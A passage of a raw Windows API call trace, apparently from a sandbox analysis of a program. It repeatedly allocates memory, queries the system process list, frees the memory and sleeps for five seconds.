RegionSize=0xdea68*=0x10000) returned 0x0 [0271.478] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0271.478] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0271.479] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0271.479] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0271.483] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0271.484] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0271.485] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0271.485] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0271.486] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0271.486] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0271.486] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0271.491] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0271.492] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0271.493] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0271.493] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0271.494] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0271.494] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0271.495] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0271.499] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0271.500] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0271.502] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0271.502] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0271.502] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0271.503] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0271.505] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0271.511] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0271.512] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0271.513] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0271.513] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0271.515] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0271.515] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0271.515] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0271.521] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0271.522] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0271.524] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0271.524] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0271.525] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0271.525] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0271.526] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0271.530] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0271.531] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0271.532] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0271.533] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0271.534] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0271.534] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0271.534] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0271.542] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0271.543] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0271.544] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0271.545] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0271.545] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0271.546] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0271.546] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0271.550] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0271.552] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0271.553] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0271.554] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0271.555] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0271.555] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0271.555] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0271.597] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0271.598] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0271.600] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0271.600] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0271.601] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0271.602] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0271.602] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0271.606] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0271.607] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0271.609] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0271.609] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0271.610] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0271.610] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0271.610] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0271.616] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0271.616] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0271.618] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0271.619] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0271.619] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0271.620] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0271.620] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0271.625] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0271.625] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0271.627] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0271.627] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0271.628] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0271.628] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0271.628] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0271.632] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0271.633] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0271.635] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0271.635] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0271.635] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0271.636] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0271.636] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0271.642] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0271.643] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0271.644] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0271.644] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0271.645] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0271.646] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0271.646] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0271.650] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0271.651] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0271.653] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0271.653] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0271.654] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0271.654] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0271.654] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0271.658] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0271.659] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0271.661] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0271.661] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0271.662] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0271.662] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0271.662] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0271.667] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0271.668] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0271.670] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0271.670] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0271.671] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0271.671] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0271.672] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0271.676] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0271.677] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0271.679] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0271.679] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0271.680] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0271.680] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0271.681] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0271.686] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0271.687] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0271.688] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0271.689] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0271.690] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0271.690] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0271.690] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0271.695] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0271.696] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0271.697] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0271.697] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0271.698] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0271.699] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0271.699] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0271.704] NtFreeVirtualMemory (ProcessHandle=0xffffffff, 